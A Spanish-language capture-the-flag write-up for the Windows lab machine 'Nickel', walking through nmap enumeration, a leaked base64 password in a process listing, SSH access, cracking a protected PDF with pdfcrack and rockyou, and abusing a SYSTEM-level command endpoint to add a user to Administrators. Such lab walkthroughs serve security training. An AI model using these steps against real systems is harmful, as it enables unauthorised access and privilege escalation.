# Nickel

## Resumen

### Información general

|             |                                               |
| ----------- | --------------------------------------------- |
| **Nivel**   | <mark style="color:orange;">Intermedio</mark> |
| **Sistema** | Windows                                       |

### Spoiler! - Roadmap

Una máquina muy sencillita en la cual se obtienen credenciales leakeadas en un fichero de un servicio web expuesto. Posteriormente se utilizan dichas credenciales para acceder vía ssh y extraer un PDF que contiene información interesante donde se indica un servicio web que se ejecuta con permisos de administrador y a través del cuál se pueden ejecutar comandos.

Se enumeran los pasos con más detalle.

1. Enumeración de servicios y obtención de un servicio web con un endpoint que muestra información sobre las credenciales del usuario `ariah`.
2. Acceso vía ssh y obtención de un fichero PDF protegido con contraseña en la carpeta del servicio `ftp`.
3. Cracking del fichero PDF y obtención de la contraseña con el diccionario de `rockyou.txt`.
4. Obtención de información en el fichero sobre un endpoint que permite ejecución de comandos como `nt authority\system`.
5. Se añade a `ariah` al grupo de administradores y `PWNED!`.

## Enumeración

### Escáner con nmap

Enumeración básica de todos los servicios vía TCP, UDP y SCTP:

```bash
IP=192.168.155.99
nmap -v -T4 -Pn -n -sS -F -oA nmap/tcp $IP
nmap -T4 -Pn -n -sY -F -oA nmap/sctp $IP
nmap -T4 -Pn -n -sU -p 53,69,111,123,137,161,500,514,520,623 -oA nmap/udp $IP
```

Escáner de puertos y servicios con scripts del Top 1000 vía TCP y UDP, y todos los puertos vía TCP:

```bash
nmap -T4 -Pn -open -sS --script=default,version,vuln -A -oA nmap/tcp-1000-scripts $IP
nmap -T4 -Pn -open --script=default,version,vuln -A -p- -oA nmap/tcp-full-scripts $IP
nmap -T3 -Pn -open -sU -sV -oA nmap/udp-1000 $IP
```

#### Resultados de nmap

El segundo escáner (`nmap -T4 -Pn -open --script=default,version,vuln -A -p- -oA nmap/tcp-full-scripts $IP)` nos da la siguiente información:

```
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
22/tcp    open  ssh           OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 8684fdd5432705cfa7f2e9e27570d5f3 (RSA)
|   256 9c93cf48a94e70f460dee1a9c2c0b6ff (ECDSA)
|_  256 004ed73b0f9fe3744d04990bb18bdea5 (ED25519)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-02-19T12:21:38+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: NICKEL
|   NetBIOS_Domain_Name: NICKEL
|   NetBIOS_Computer_Name: NICKEL
|   DNS_Domain_Name: nickel
|   DNS_Computer_Name: nickel
|   Product_Version: 10.0.18362
|_  System_Time: 2023-02-19T12:19:27+00:00
| ssl-cert: Subject: commonName=nickel
| Not valid before: 2023-02-18T12:02:35
|_Not valid after:  2023-08-20T12:02:35
8089/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.223.99
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.223.99:8089/
|     Form id: 
|     Form action: http://169.254.109.39:33333/list-current-deployments
|     
|     Path: http://192.168.223.99:8089/
|     Form id: 
|     Form action: http://169.254.109.39:33333/list-running-procs
|     
|     Path: http://192.168.223.99:8089/
|     Form id: 
|_    Form action: http://169.254.109.39:33333/list-active-nodes
|_http-title: Site doesn't have a title.
|_http-vuln-cve2013-7091: ERROR: Script execution failed (use -d to debug)
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
33333/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-vuln-cve2013-7091: ERROR: Script execution failed (use -d to debug)
| http-phpmyadmin-dir-traversal: 
|   VULNERABLE:
|   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
|     State: UNKNOWN (unable to test)
|     IDs:  CVE:CVE-2005-3299
|       PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|       
|     Disclosure date: 2005-10-nil
|     Extra information:
|       ../../../../../etc/passwd :
|   <p>Not Implemented</p>
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
|_      http://www.exploit-db.com/exploits/1244/
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)
|_http-title: Site doesn't have a title.
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|phone
Running: Linux 2.4.X|2.6.X, Sony Ericsson embedded
OS CPE: cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:sonyericsson:u8i_vivaz
OS details: Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22), Sony Ericsson U8i Vivaz mobile phone
Network Distance: 3 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-vuln-cve2009-3103: 
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|           
|     Disclosure date: 2009-09-08
|     References:
|       http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms10-061: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
|_smb-vuln-ms10-054: false
|_smb2-time: ERROR: Script execution failed (use -d to debug)
|_samba-vuln-cve-2012-1182: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
|_smb2-security-mode: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
```

### Análisis del escáner

Se obtienen distintas URLs y servicios abiertos, realizando una enumeración básica de cada uno, se obtiene un endpoint que resulta interesante.

```
http://169.254.109.39:33333/list-running-procs
```

Modificando la petición con la IP de la máquina víctima y para que la petición se realice con el método HTTP POST en vez de GET, se obtiene lo siguiente:

```
POST /list-running-procs HTTP/1.1
Host: 192.168.155.99:33333
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 0

```

```
name        : System Idle Process
commandline : 

name        : System
commandline : 

name        : Registry
commandline : 

name        : smss.exe
commandline : 

name        : csrss.exe
commandline : 

name        : wininit.exe
commandline : 

name        : csrss.exe
commandline : 

name        : winlogon.exe
commandline : winlogon.exe

name        : services.exe
commandline : 

name        : lsass.exe
commandline : C:\Windows\system32\lsass.exe

name        : fontdrvhost.exe
commandline : "fontdrvhost.exe"

name        : fontdrvhost.exe
commandline : "fontdrvhost.exe"

name        : dwm.exe
commandline : "dwm.exe"

name        : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws80.ps1

name        : Memory Compression
commandline : 

name        : cmd.exe
commandline : cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p 
              "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh

name        : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws8089.ps1

name        : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws33333.ps1

name        : spoolsv.exe
commandline : C:\Windows\System32\spoolsv.exe

name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4

name        : FileZilla Server.exe
commandline : "C:\Program Files (x86)\FileZilla Server\FileZilla Server.exe"

name        : sshd.exe
commandline : "C:\Program Files\OpenSSH\OpenSSH-Win64\sshd.exe"

name        : VGAuthService.exe
commandline : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"

name        : vmtoolsd.exe
commandline : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"

name        : dllhost.exe
commandline : C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}

name        : WmiPrvSE.exe
commandline : C:\Windows\system32\wbem\wmiprvse.exe

name        : LogonUI.exe
commandline : "LogonUI.exe" /flags:0x2 /state0:0xa392c855 /state1:0x41c64e6d

name        : msdtc.exe
commandline : C:\Windows\System32\msdtc.exe

name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4

name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4

name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4

name        : WmiPrvSE.exe
commandline : C:\Windows\system32\wbem\wmiprvse.exe

name        : SgrmBroker.exe
commandline : 

name        : SearchIndexer.exe
commandline : C:\Windows\system32\SearchIndexer.exe /Embedding

name        : WmiApSrv.exe
commandline : C:\Windows\system32\wbem\WmiApSrv.exe

name        : CompatTelRunner.exe
commandline : C:\Windows\system32\compattelrunner.exe

name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4

name        : CompatTelRunner.exe
commandline : C:\Windows\system32\compattelrunner.exe -maintenance

name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
```

Entre la información, obtenemos un nombre de usuario y contraseña, que por sus características, se deduce que está codificada en base64.

```
name        : cmd.exe
commandline : cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p 
              "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh
```

Decodificamos la cadena y obtenemos la contraseña de `ariah`:

```
echo -n Tm93aXNlU2xvb3BUaGVvcnkxMzkK | base64 –decode
```

```
NowiseSloopTheory139
```

## Explotación

### Acceso directo al sistema

Una vez se han obtenido credenciales válidas en el servidor, se prueba a acceder con dichas credenciales en los servicios disponibles, entre ellos `ssh` y `ftp`:

```
ssh ariah@192.168.155.99
```

```
ftp ftp://ariah:NowiseSloopTheory139@192.168.155.99
```

### Post-enumeración

Se realiza una enumeración básica del sistema y se obtiene que existe un fichero llamado `Infrastructure.pdf` en el servicio FTP.

Para descargarlo vía SSH:

```
scp ariah@192.168.155.99:C:/ftp/Infrastructure.pdf .
```

Al intentar abrir el fichero, se observa que tiene contraseña. Por lo que realizaremos un ataque por diccionario con `pdfcrack` utilizando el diccionario de `rockyou.txt`:

```
pdfcrack -f Infrastructure.pdf -w /usr/share/wordlists/rockyou.txt
```

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FJ3dkM9acw1MJl94IfmMS%2FPasted%20image%2020230226215055.png?alt=media&#x26;token=e6f61d6f-bf34-4b25-abe5-a6cb9f4a94dd" alt=""><figcaption></figcaption></figure>

Se obtiene que la contraseña es: `ariah4168`

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2Fij5qKCrAtl45ETOd2DWh%2FPasted%20image%2020230226215902.png?alt=media&#x26;token=ea51e6a8-e1a7-4147-b16c-13de27bf4041" alt=""><figcaption></figcaption></figure>

En el endpoint "Temporary Command" parece que podría ser posible ejecutar comandos, vamos a ver si hay suerte y es posible que el servicio se esté ejecutando como `Administrador`.

{% tabs %}
{% tab title="Curl" %}
Desde la sesión SSH, se ejecuta el comando `curl` contra el *endpoint* con el comando `whoami`:

```
curl http://localhost/?whoami
```

Se obtiene la siguiente respuesta:

```
<!doctype html><html><body>dev-api started at 2020-10-20T10:38:24

        <pre>nt authority\system
</pre>
</body></html>
```

{% endtab %}

{% tab title="Powershell" %}
Ejecutamos lo siguiente para cambiar a `powershell`:

```
ariah@NICKEL C:\>powershell.exe
```

Se realiza la petición y se obtiene el contenido de la respuesta

```
$response = Invoke-WebRequest 'http://localhost/?whoami' -UseBasicParsing
$response.RawContent
```

Se obtiene la siguiente respuesta:

```
PS C:\ftp> $response = Invoke-WebRequest 'http://localhost/?whoami' -UseBasicParsing
PS C:\ftp> $response.RawContent
HTTP/1.1 200 OK
Content-Length: 118
Date: Sun, 26 Feb 2023 21:12:33 GMT
Last-Modified: Sun, 26 Feb 2023 13:12:33 GMT
Server: Powershell Webserver/1.2 on Microsoft-HTTPAPI/2.0

<!doctype html><html><body>dev-api started at 2020-10-20T10:38:24

        <pre>nt authority\system
</pre>
</body></html>
```

{% endtab %}
{% endtabs %}

## Escalada de privilegios

Se añade a `ariah` al grupo de administradores desde el endpoint:

```
net localgroup Administrators ariah /add
```

Se codifica la cadena para enviarla desde la URL:

<https://meyerweb.com/eric/tools/dencoder/>

Se ejecuta el comando y se obtiene una respuesta satisfactoria:

```
$response = Invoke-WebRequest 'http://localhost/?net%20localgroup%20Administrators%20ariah%20%2Fadd' -UseBasicParsing
$response.RawContent
```

```
PS C:\Users\Administrator> $response = Invoke-WebRequest 'http://localhost/?net%20localgroup%20Administrators%20ariah%20%2Fadd' -UseBasicParsin
g                                                                                                                                              
PS C:\Users\Administrator> $response.RawContent
HTTP/1.1 200 OK
Content-Length: 136
Date: Sun, 26 Feb 2023 21:19:54 GMT
Last-Modified: Sun, 26 Feb 2023 13:19:54 GMT
Server: Powershell Webserver/1.2 on Microsoft-HTTPAPI/2.0

<!doctype html><html><body>dev-api started at 2020-10-20T10:38:24

        <pre>The command completed successfully.

</pre>
</body></html>
```

Se comprueba que el usuario se ha añadido en el grupo de administradores:

```
PS C:\Users\Administrator> net localgroup Administrators 
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
ariah
The command completed successfully.

```

Y ya se puede leer la flag que se encuentra en el escritorio del administrador:

```
type C:\Users\Administrator\Desktop\proof.txt
```

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2F0yA3iEz0BXMExqYtfC9F%2Fpanda.gif?alt=media&#x26;token=b6d9028c-03a6-412a-ab50-f316153ac81c" alt=""><figcaption></figcaption></figure>